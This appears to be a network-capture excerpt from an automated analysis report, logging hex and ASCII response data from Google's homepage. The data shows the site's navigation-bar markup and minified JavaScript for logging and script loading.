                                                          2022-10-03 15:29:37 UTC69INData Raw: 72 69 66 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 7d 2e 6c 73 62 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 61 64 63 65 30 7d 2e 6c 73 74 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 58 5f 6e 4e 64 52 78 67 6f 57 68 50 69 33 6b 70 5f 50 41 70 38 41 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 65 72 64 3d 7b 6a 73 72 3a 31 2c 62 76 3a 31 36 36 34 2c 64 65 3a 74 72 75 65 7d 3b 0a 76 61 72 20 68 3d 74 68 69 73 7c 7c 73 65 6c 66 3b 76 61 72 20 6b 2c 6c 3d 6e 75 6c 6c 21 3d 28 6b 3d 68 2e 6d 65 69 29 3f 6b 3a 31 2c 6e 2c 70 3d 6e 75 6c 6c 21 3d 28 6e 3d 68 2e 73 64 6f 29 3f 6e 3a 21 30 2c 71 3d 30 2c 72
                                                          Data Ascii: rif;vertical-align:top}.lsb:active{background:#dadce0}.lst:focus{outline:none}</style><script nonce="X_nNdRxgoWhPi3kp_PAp8A">(function(){window.google.erd={jsr:1,bv:1664,de:true};var h=this||self;var k,l=null!=(k=h.mei)?k:1,n,p=null!=(n=h.sdo)?n:!0,q=0,r
                                                          2022-10-03 15:29:37 UTC70INData Raw: 72 6f 72 3f 65 3a 45 72 72 6f 72 28 61 29 2c 76 6f 69 64 20 30 3d 3d 3d 64 7c 7c 22 6c 69 6e 65 4e 75 6d 62 65 72 22 69 6e 20 61 7c 7c 28 61 2e 6c 69 6e 65 4e 75 6d 62 65 72 3d 64 29 2c 76 6f 69 64 20 30 3d 3d 3d 62 7c 7c 22 66 69 6c 65 4e 61 6d 65 22 69 6e 20 61 7c 7c 28 61 2e 66 69 6c 65 4e 61 6d 65 3d 62 29 2c 67 6f 6f 67 6c 65 2e 6d 6c 28 61 2c 21 31 2c 76 6f 69 64 20 30 2c 21 31 2c 22 53 79 6e 74 61 78 45 72 72 6f 72 22 3d 3d 3d 61 2e 6e 61 6d 65 7c 7c 22 53 79 6e 74 61 78 45 72 72 6f 72 22 3d 3d 3d 61 2e 6d 65 73 73 61 67 65 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 31 31 29 7c 7c 30 3c 61 2e 6d 65 73 73 61 67 65 2e 69 6e 64 65 78 4f 66 28 22 53 63 72 69 70 74 20 65 72 72 6f 72 22 29 3f 32 3a 30 29 29 3b 72 3d 6e 75 6c 6c 3b 70 26 26 71 3e 3d 6c 26 26
                                                          Data Ascii: ror?e:Error(a),void 0===d||"lineNumber"in a||(a.lineNumber=d),void 0===b||"fileName"in a||(a.fileName=b),google.ml(a,!1,void 0,!1,"SyntaxError"===a.name||"SyntaxError"===a.message.substring(0,11)||0<a.message.indexOf("Script error")?2:0));r=null;p&&q>=l&&
                                                          2022-10-03 15:29:37 UTC71INData Raw: 3b 62 2e 6f 6e 65 72 72 6f 72 3d 62 2e 6f 6e 6c 6f 61 64 3d 62 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 64 65 6c 65 74 65 20 69 61 5b 63 5d 7d 63 61 74 63 68 28 64 29 7b 7d 7d 3b 69 61 5b 63 5d 3d 62 3b 62 2e 73 72 63 3d 61 3b 68 61 3d 63 2b 31 7d 2c 69 61 3d 5b 5d 2c 68 61 3d 30 3b 70 28 22 6c 6f 67 67 65 72 22 2c 7b 69 6c 3a 75 2c 6d 6c 3a 74 2c 6c 6f 67 3a 6a 61 7d 29 3b 76 61 72 20 76 3d 77 69 6e 64 6f 77 2e 67 62 61 72 2e 6c 6f 67 67 65 72 3b 76 61 72 20 77 3d 7b 7d 2c 6b 61 3d 7b 7d 2c 78 3d 5b 5d 2c 6c 61 3d 68 2e 62 28 22 30 2e 31 22 2c 2e 31 29 2c 6d 61 3d 68 2e 61 28 22 31 22 2c 21 30 29 2c 6e 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 78 2e 70 75 73 68 28 5b 61 2c 62 5d 29 7d 2c 6f 61 3d 66 75 6e 63 74 69 6f
                                                          Data Ascii: ;b.onerror=b.onload=b.onabort=function(){try{delete ia[c]}catch(d){}};ia[c]=b;b.src=a;ha=c+1},ia=[],ha=0;p("logger",{il:u,ml:t,log:ja});var v=window.gbar.logger;var w={},ka={},x=[],la=h.b("0.1",.1),ma=h.a("1",!0),na=function(a,b){x.push([a,b])},oa=functio
                                                          2022-10-03 15:29:37 UTC71INData Raw: 64 65 0d 0a 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 63 2e 73 72 63 3d 61 3b 63 2e 61 73 79 6e 63 3d 6d 61 3b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3c 6c 61 26 26 28 63 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 6f 6e 65 72 72 6f 72 3d 6e 75 6c 6c 3b 74 28 45 72 72 6f 72 28 22 42 75 6e 64 6c 65 20 6c 6f 61 64 20 66 61 69 6c 65 64 3a 20 6e 61 6d 65 3d 22 2b 28 62 7c 7c 22 55 4e 4b 22 29 2b 22 20 75 72 6c 3d 22 2b 61 29 29 7d 29 3b 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 6a 73 63 22 29 7c 7c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 0d 0a
                                                          Data Ascii: dereateElement("script");c.src=a;c.async=ma;Math.random()<la&&(c.onerror=function(){c.onerror=null;t(Error("Bundle load failed: name="+(b||"UNK")+" url="+a))});(document.getElementById("xjsc")||document.getElementsByTagName(
                                                          2022-10-03 15:29:37 UTC72INData Raw: 36 61 65 34 0d 0a 22 62 6f 64 79 22 29 5b 30 5d 7c 7c 0a 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 29 7d 2c 73 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 2c 63 3d 30 3b 28 62 3d 78 5b 63 5d 29 26 26 62 5b 30 5d 21 3d 61 3b 2b 2b 63 29 3b 21 62 7c 7c 62 5b 31 5d 2e 6c 7c 7c 62 5b 31 5d 2e 73 7c 7c 28 62 5b 31 5d 2e 73 3d 21 30 2c 72 61 28 32 2c 61 29 2c 62 5b 31 5d 2e 75 72 6c 26 26 71 61 28 62 5b 31 5d 2e 75 72 6c 2c 61 29 2c 62 5b 31 5d 2e 6c 69 62 73 26 26 44 26 26 44 28 62 5b 31 5d 2e 6c 69 62 73 29 29 7d 2c 74 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 42 28 22 67 63 22 2c 61 29 7d 2c 75 61 3d 6e 75 6c 6c
                                                          Data Ascii: 6ae4"body")[0]||document.getElementsByTagName("head")[0]).appendChild(c)},sa=function(a){for(var b,c=0;(b=x[c])&&b[0]!=a;++c);!b||b[1].l||b[1].s||(b[1].s=!0,ra(2,a),b[1].url&&qa(b[1].url,a),b[1].libs&&D&&D(b[1].libs))},ta=function(a){B("gc",a)},ua=null
                                                          2022-10-03 15:29:37 UTC73INData Raw: 69 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 29 3b 47 2e 6d 3d 45 28 47 2e 6d 2c 22 22 29 3b 47 2e 6c 3d 45 28 47 2e 6c 2c 5b 5d 29 3b 47 2e 64 70 6f 3d 45 28 47 2e 64 70 6f 2c 22 22 29 3b 78 61 7c 7c 78 2e 70 75 73 68 28 5b 22 67 6c 22 2c 7b 75 72 6c 3a 22 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 6a 73 2f 61 62 63 2f 67 6c 6d 5f 65 37 62 62 33 39 61 37 65 31 61 32 34 35 38 31 66 66 34 66 38 64 31 39 39 36 37 38 62 31 62 39 2e 6a 73 22 7d 5d 29 3b 76 61 72 20 45 61 3d 7b 70 75 3a 79 61 2c 73 68 3a 22 22 2c 73 69 3a 7a 61 2c 68 6c 3a 22 65 6e 22 7d 3b 77 2e 67 6c 3d 45 61 3b 77 61 3f 41 61 2e 6c 6f 61 64 7c 7c 70 28 22 6c 6f 61 64 22 2c 42 61 2c 41 61 29 3a 70 28 22 6c 6f 61 64 22 2c 42 61 2c 41 61 29 3b 70 28 22 64 67 6c 22 2c 42 61 29
                                                          Data Ascii: is.google.com");G.m=E(G.m,"");G.l=E(G.l,[]);G.dpo=E(G.dpo,"");xa||x.push(["gl",{url:"//ssl.gstatic.com/gb/js/abc/glm_e7bb39a7e1a24581ff4f8d199678b1b9.js"}]);var Ea={pu:ya,sh:"",si:za,hl:"en"};w.gl=Ea;wa?Aa.load||p("load",Ba,Aa):p("load",Ba,Aa);p("dgl",Ba)
                                                          2022-10-03 15:29:37 UTC74INData Raw: 6c 61 73 73 4e 61 6d 65 2b 3d 28 22 22 21 3d 63 3f 22 20 22 3a 22 22 29 2b 62 29 7d 2c 4a 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 61 2e 63 6c 61 73 73 4e 61 6d 65 3b 62 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 73 3f 5c 5c 62 22 2b 62 2b 22 5c 5c 62 22 29 3b 63 26 26 63 2e 6d 61 74 63 68 28 62 29 26 26 28 61 2e 63 6c 61 73 73 4e 61 6d 65 3d 63 2e 72 65 70 6c 61 63 65 28 62 2c 22 22 29 29 7d 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 62 22 2b 62 2b 22 5c 5c 62 22 29 3b 61 3d 61 2e 63 6c 61 73 73 4e 61 6d 65 3b 72 65 74 75 72 6e 21 28 21 61 7c 7c 21 61 2e 6d 61 74 63 68 28 62 29 29 7d 2c 4d 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 48 28 61 2c 62 29 3f 4a 28 61 2c 62 29
                                                          Data Ascii: lassName+=(""!=c?" ":"")+b)},J=function(a,b){var c=a.className;b=new RegExp("\\s?\\b"+b+"\\b");c&&c.match(b)&&(a.className=c.replace(b,""))},H=function(a,b){b=new RegExp("\\b"+b+"\\b");a=a.className;return!(!a||!a.match(b))},Ma=function(a,b){H(a,b)?J(a,b)
                                                          2022-10-03 15:29:37 UTC75INData Raw: 76 61 72 20 61 3d 56 61 28 29 3b 72 65 74 75 72 6e 20 30 3c 61 2e 6c 65 6e 67 74 68 3f 61 5b 30 5d 3a 6e 75 6c 6c 7d 2c 58 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 5f 37 30 22 29 7d 2c 4b 3d 7b 7d 2c 4c 3d 7b 7d 2c 59 61 3d 7b 7d 2c 4d 3d 7b 7d 2c 4e 3d 76 6f 69 64 20 30 2c 63 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 72 79 7b 76 61 72 20 63 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 22 29 3b 49 28 63 2c 22 67 62 70 64 6a 73 22 29 3b 4f 28 29 3b 5a 61 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 22 29 29 26 26 49 28 63 2c 22 67 62 72 74 6c 22 29 3b 69 66 28 62 26 26 62
                                                          Data Ascii: var a=Va();return 0<a.length?a[0]:null},Xa=function(){return document.getElementById("gb_70")},K={},L={},Ya={},M={},N=void 0,cb=function(a,b){try{var c=document.getElementById("gb");I(c,"gbpdjs");O();Za(document.getElementById("gb"))&&I(c,"gbrtl");if(b&&b
                                                          2022-10-03 15:29:37 UTC77INData Raw: 64 65 73 2e 6c 65 6e 67 74 68 3b 66 3d 21 31 3b 66 6f 72 28 76 61 72 20 6d 3d 2d 31 2c 71 2c 53 3d 30 3b 71 3d 63 5b 53 5d 3b 53 2b 2b 29 7b 66 6f 72 28 76 61 72 20 46 3d 76 6f 69 64 20 30 2c 54 3d 30 3b 46 3d 71 5b 54 5d 3b 54 2b 2b 29 7b 66 6f 72 28 3b 64 3c 6e 26 26 48 28 6b 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 64 5d 2c 46 29 3b 29 64 2b 2b 3b 69 66 28 46 3d 3d 62 29 7b 6b 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6c 2c 6b 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 64 5d 7c 7c 0a 6e 75 6c 6c 29 3b 66 3d 21 30 3b 62 72 65 61 6b 7d 7d 69 66 28 66 29 7b 69 66 28 64 2b 31 3c 6b 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 55 3d 6b 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 64 2b 31 5d 3b 48 28 55 2e 66 69 72 73 74 43 68 69 6c 64 2c 22 67 62 6d
                                                          Data Ascii: des.length;f=!1;for(var m=-1,q,S=0;q=c[S];S++){for(var F=void 0,T=0;F=q[T];T++){for(;d<n&&H(k.childNodes[d],F);)d++;if(F==b){k.insertBefore(l,k.childNodes[d]||null);f=!0;break}}if(f){if(d+1<k.childNodes.length){var U=k.childNodes[d+1];H(U.firstChild,"gbm
                                                          2022-10-03 15:29:37 UTC78INData Raw: 70 3b 22 29 3b 50 28 61 2c 21 30 29 3b 62 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 3f 62 3a 31 45 34 3b 76 61 72 20 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 73 62 28 61 29 7d 3b 71 62 3d 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 63 2c 62 29 7d 7d 2c 74 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 4f 28 29 3b 61 26 26 28 50 28 61 2c 21 31 29 2c 72 62 28 61 2c 22 22 29 29 7d 2c 73 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 72 79 7b 4f 28 29 3b 76 61 72 20 62 3d 61 7c 7c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 4e 29 3b 62 26 26 28 72 62 28 62 2c 22 54 68 69 73 20 73 65 72 76 69 63 65 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 25 31 24 73 50 6c 65 61 73 65 20
                                                          Data Ascii: p;");P(a,!0);b="undefined"!=typeof b?b:1E4;var c=function(){sb(a)};qb=window.setTimeout(c,b)}},tb=function(a){O();a&&(P(a,!1),rb(a,""))},sb=function(a){try{O();var b=a||document.getElementById(N);b&&(rb(b,"This service is currently unavailable.%1$sPlease
                                                          2022-10-03 15:29:37 UTC79INData Raw: 62 22 2c 52 61 29 3b 70 28 22 70 63 22 2c 53 61 29 3b 70 28 22 62 73 79 22 2c 76 62 29 3b 68 2e 64 3d 62 62 3b 68 2e 6a 3d 75 62 3b 76 61 72 20 78 62 3d 7b 7d 3b 77 2e 62 61 73 65 3d 78 62 3b 78 2e 70 75 73 68 28 5b 22 6d 22 2c 7b 75 72 6c 3a 22 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 6a 73 2f 73 65 6d 5f 38 64 32 38 37 36 38 34 63 38 37 39 31 34 36 35 63 62 34 62 65 61 62 39 36 65 63 63 33 36 64 36 2e 6a 73 22 7d 5d 29 3b 67 2e 73 67 3d 7b 63 3a 22 31 22 7d 3b 70 28 22 77 67 22 2c 7b 72 67 3a 7b 7d 7d 29 3b 76 61 72 20 79 62 3d 7b 74 69 77 3a 68 2e 63 28 22 31 35 30 30 30 22 2c 30 29 2c 74 69 65 3a 68 2e 63 28 22 33 30 30 30 30 22 2c 30 29 7d 3b 77 2e 77 67 3d 79 62 3b 76 61 72 20 7a 62 3d 7b 74 68 69 3a 68 2e 63 28 22 31 30 30 30
                                                          Data Ascii: b",Ra);p("pc",Sa);p("bsy",vb);h.d=bb;h.j=ub;var xb={};w.base=xb;x.push(["m",{url:"//ssl.gstatic.com/gb/js/sem_8d287684c8791465cb4beab96ecc36d6.js"}]);g.sg={c:"1"};p("wg",{rg:{}});var yb={tiw:h.c("15000",0),tie:h.c("30000",0)};w.wg=yb;var zb={thi:h.c("1000
                                                          2022-10-03 15:29:37 UTC80INData Raw: 3d 22 26 6f 67 67 76 3d 22 2b 64 28 22 65 73 5f 70 6c 75 73 6f 6e 65 5f 67 63 5f 32 30 32 32 30 38 30 31 2e 30 5f 70 30 22 29 2c 54 3d 64 28 22 63 6f 6d 22 29 2c 55 3d 64 28 22 65 6e 22 29 2c 56 3d 0a 64 28 22 47 42 52 22 29 3b 76 61 72 20 79 3d 30 3b 68 2e 61 28 22 22 29 26 26 28 79 7c 3d 31 29 3b 68 2e 61 28 22 22 29 26 26 28 79 7c 3d 32 29 3b 68 2e 61 28 22 22 29 26 26 28 79 7c 3d 34 29 3b 61 3d 5b 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 67 65 6e 5f 32 30 34 3f 61 74 79 70 3d 69 26 7a 78 3d 22 2c 66 2c 22 26 6f 67 65 3d 22 2c 61 2c 22 26 6f 67 65 78 3d 22 2c 6b 2c 22 26 6f 67 65 76 3d 22 2c 6c 2c 22 26 6f 67 66 3d 22 2c 6d 2c 22 26 6f 67 70 3d 22 2c 71 2c 22 26 6f 67 72 70 3d 22 2c 6e 2c 22 26 6f 67 73 72 3d 22 2c 63 2c 22 26 6f 67 76 3d
                                                          Data Ascii: ="&oggv="+d("es_plusone_gc_20220801.0_p0"),T=d("com"),U=d("en"),V=d("GBR");var y=0;h.a("")&&(y|=1);h.a("")&&(y|=2);h.a("")&&(y|=4);a=["//www.google.com/gen_204?atyp=i&zx=",f,"&oge=",a,"&ogex=",k,"&ogev=",l,"&ogf=",m,"&ogp=",q,"&ogrp=",n,"&ogsr=",c,"&ogv=
                                                          2022-10-03 15:29:37 UTC81INData Raw: 3b 70 28 22 73 70 64 22 2c 55 62 29 3b 70 28 22 70 61 61 22 2c 4e 62 29 3b 70 28 22 70 72 6d 22 2c 4f 62 29 3b 6d 62 28 22 67 62 64 34 22 2c 4f 62 29 3b 0a 69 66 28 68 2e 61 28 22 22 29 29 7b 76 61 72 20 56 62 3d 7b 64 3a 68 2e 61 28 22 22 29 2c 65 3a 22 22 2c 73 61 6e 77 3a 68 2e 61 28 22 22 29 2c 70 3a 22 68 74 74 70 73 3a 2f 2f 6c 68 33 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 6f 67 77 2f 64 65 66 61 75 6c 74 2d 75 73 65 72 3d 73 39 36 22 2c 63 70 3a 22 31 22 2c 78 70 3a 68 2e 61 28 22 31 22 29 2c 6d 67 3a 22 25 31 24 73 20 28 64 65 6c 65 67 61 74 65 64 29 22 2c 6d 64 3a 22 25 31 24 73 20 28 64 65 66 61 75 6c 74 29 22 2c 6d 68 3a 22 32 32 30 22 2c 73 3a 22 31 22 2c 70 70 3a 54 62 2c 70 70 6c 3a 68 2e 61 28 22 22 29 2c 70 70
                                                          Data Ascii: ;p("spd",Ub);p("paa",Nb);p("prm",Ob);mb("gbd4",Ob);if(h.a("")){var Vb={d:h.a(""),e:"",sanw:h.a(""),p:"https://lh3.googleusercontent.com/ogw/default-user=s96",cp:"1",xp:h.a("1"),mg:"%1$s (delegated)",md:"%1$s (default)",mh:"220",s:"1",pp:Tb,ppl:h.a(""),pp
                                                          2022-10-03 15:29:37 UTC83INData Raw: 69 65 2e 6d 61 74 63 68 28 22 50 52 45 46 22 29 7d 63 61 74 63 68 28 63 29 7b 7d 72 65 74 75 72 6e 21 62 7d 2c 65 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 7d 63 61 74 63 68 28 61 29 7b 72 65 74 75 72 6e 21 31 7d 7d 2c 66 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 26 26 61 2e 73 74 79 6c 65 26 26 61 2e 73 74 79 6c 65 2e 62 65 68 61 76 69 6f 72 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 61 2e 6c 6f 61 64 7d 2c 67 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 74 72 79 7b 64 63 28 64 6f 63 75 6d 65 6e 74 29 7c 7c 28 64 7c 7c 28
                                                          Data Ascii: ie.match("PREF")}catch(c){}return!b},ec=function(){try{return!!e.localStorage&&"object"==typeof e.localStorage}catch(a){return!1}},fc=function(a){return a&&a.style&&a.style.behavior&&"undefined"!=typeof a.load},gc=function(a,b,c,d){try{dc(document)||(d||(
                                                          2022-10-03 15:29:37 UTC84INData Raw: 68 69 73 2c 64 29 7d 29 7d 7d 3b 5a 28 67 2e 75 70 2c 22 73 6c 22 29 3b 5a 28 67 2e 75 70 2c 22 73 69 22 29 3b 5a 28 67 2e 75 70 2c 22 73 70 6c 22 29 3b 5a 28 67 2e 75 70 2c 22 64 70 63 22 29 3b 5a 28 67 2e 75 70 2c 22 69 69 63 22 29 3b 67 2e 6d 63 66 28 22 75 70 22 2c 7b 73 70 3a 68 2e 62 28 22 30 2e 30 31 22 2c 31 29 2c 74 6c 64 3a 22 63 6f 2e 75 6b 22 2c 70 72 69 64 3a 22 31 22 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 63 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 66 6f 72 28 76 61 72 20 6d 3b 28 6d 3d 6b 5b 6c 2b 2b 5d 29 26 26 22 6d 22 21 3d 6d 5b 30 5d 26 26 21 6d 5b 31 5d 2e 61 75 74 6f 3b 29 3b 6d 26 26 28 72 61 28 32 2c 6d 5b 30 5d 29 2c 6d 5b 31 5d 2e 75 72 6c 26 26 71 61 28 6d 5b 31 5d 2e 75 72 6c 2c 6d 5b 30 5d 29 2c 6d 5b 31 5d 2e 6c 69 62
                                                          Data Ascii: his,d)})}};Z(g.up,"sl");Z(g.up,"si");Z(g.up,"spl");Z(g.up,"dpc");Z(g.up,"iic");g.mcf("up",{sp:h.b("0.01",1),tld:"co.uk",prid:"1"});function lc(){function a(){for(var m;(m=k[l++])&&"m"!=m[0]&&!m[1].auto;);m&&(ra(2,m[0]),m[1].url&&qa(m[1].url,m[0]),m[1].lib
                                                          2022-10-03 15:29:37 UTC85INData Raw: 62 61 72 3b 61 2e 6d 63 66 28 22 6d 6d 22 2c 7b 73 3a 22 31 22 7d 29 3b 7d 63 61 74 63 68 28 65 29 7b 77 69 6e 64 6f 77 2e 67 62 61 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 2e 6d 6c 28 65 2c 7b 22 5f 73 6e 22 3a 22 63 66 67 2e 69 6e 69 74 22 7d 29 3b 7d 7d 29 28 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 76 61 72 20 64 3d 77 69 6e 64 6f 77 2e 67 62 61 72 2e 69 2e 69 3b 76 61 72 20 65 3d 77 69 6e 64 6f 77 2e 67 62 61 72 3b 76 61 72 20 66 3d 65 2e 69 3b 76
                                                          Data Ascii: bar;a.mcf("mm",{s:"1"});}catch(e){window.gbar&&gbar.logger&&gbar.logger.ml(e,{"_sn":"cfg.init"});}})();(function(){try{/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0*/var d=window.gbar.i.i;var e=window.gbar;var f=e.i;v
                                                          2022-10-03 15:29:37 UTC86INData Raw: 68 73 74 61 72 74 22 2c 22 74 6f 75 63 68 6d 6f 76 65 22 2c 22 77 68 65 65 6c 22 2c 22 6b 65 79 64 6f 77 6e 22 5d 2c 67 62 6c 3a 22 65 73 5f 70 6c 75 73 6f 6e 65 5f 67 63 5f 32 30 32 32 30 38 30 31 2e 30 5f 70 30 22 2c 68 64 3a 22 63 6f 6d 22 2c 68 6c 3a 22 65 6e 22 2c 69 72 70 3a 64 28 22 22 29 2c 70 69 64 3a 65 28 22 31 22 29 2c 0a 73 6e 69 64 3a 65 28 22 32 38 38 33 34 22 29 2c 74 6f 3a 65 28 22 33 30 30 30 30 30 22 29 2c 75 3a 65 28 22 22 29 2c 76 66 3a 22 2e 36 36 2e 22 7d 2c 67 3d 66 2c 68 3d 5b 22 62 6e 64 63 66 67 22 5d 2c 6b 3d 61 3b 68 5b 30 5d 69 6e 20 6b 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6b 2e 65 78 65 63 53 63 72 69 70 74 7c 7c 6b 2e 65 78 65 63 53 63 72 69 70 74 28 22 76 61 72 20 22 2b 68 5b 30 5d 29 3b 66 6f
                                                          Data Ascii: hstart","touchmove","wheel","keydown"],gbl:"es_plusone_gc_20220801.0_p0",hd:"com",hl:"en",irp:d(""),pid:e("1"),snid:e("28834"),to:e("300000"),u:e(""),vf:".66."},g=f,h=["bndcfg"],k=a;h[0]in k||"undefined"==typeof k.execScript||k.execScript("var "+h[0]);fo
                                                          2022-10-03 15:29:37 UTC88INData Raw: 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 73 3e 53 65 61 72 63 68 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 74 3e 3c 61 20 63 6c 61 73 73 3d 67 62 7a 74 20 69 64 3d 67 62 5f 32 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 69 6d 67 68 70 3f 68 6c 3d 65 6e 26 74 61 62 3d 77 69 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 73 3e 49 6d 61 67 65 73 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 74 3e 3c 61 20 63 6c 61 73 73 3d 67 62 7a 74 20 69 64 3d 67 62 5f 38 20 68 72 65
                                                          Data Ascii: ><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.co.uk/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 hre
                                                          2022-10-03 15:29:37 UTC89INData Raw: 3d 22 67 62 74 73 20 67 62 74 73 61 22 3e 3c 73 70 61 6e 20 69 64 3d 67 62 7a 74 6d 73 31 3e 4d 6f 72 65 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 6d 61 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 27 58 5f 6e 4e 64 52 78 67 6f 57 68 50 69 33 6b 70 5f 50 41 70 38 41 27 3e 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 67 62 7a 74 6d 27 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 66 75 6e 63 74 69 6f 6e 20 63 6c 69 63 6b 48 61 6e 64 6c 65 72 28 29 20 7b 20 67 62 61 72 2e 74 67 28 65 76 65 6e 74 2c 74 68 69 73 29 3b 20 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 64 69 76 20 63 6c 61 73 73 3d 67 62 6d 20 69 64 3d 67 62 64
                                                          Data Ascii: ="gbts gbtsa"><span id=gbztms1>More</span><span class=gbma></span></span></a><script nonce='X_nNdRxgoWhPi3kp_PAp8A'>document.getElementById('gbztm').addEventListener('click', function clickHandler() { gbar.tg(event,this); });</script><div class=gbm id=gbd
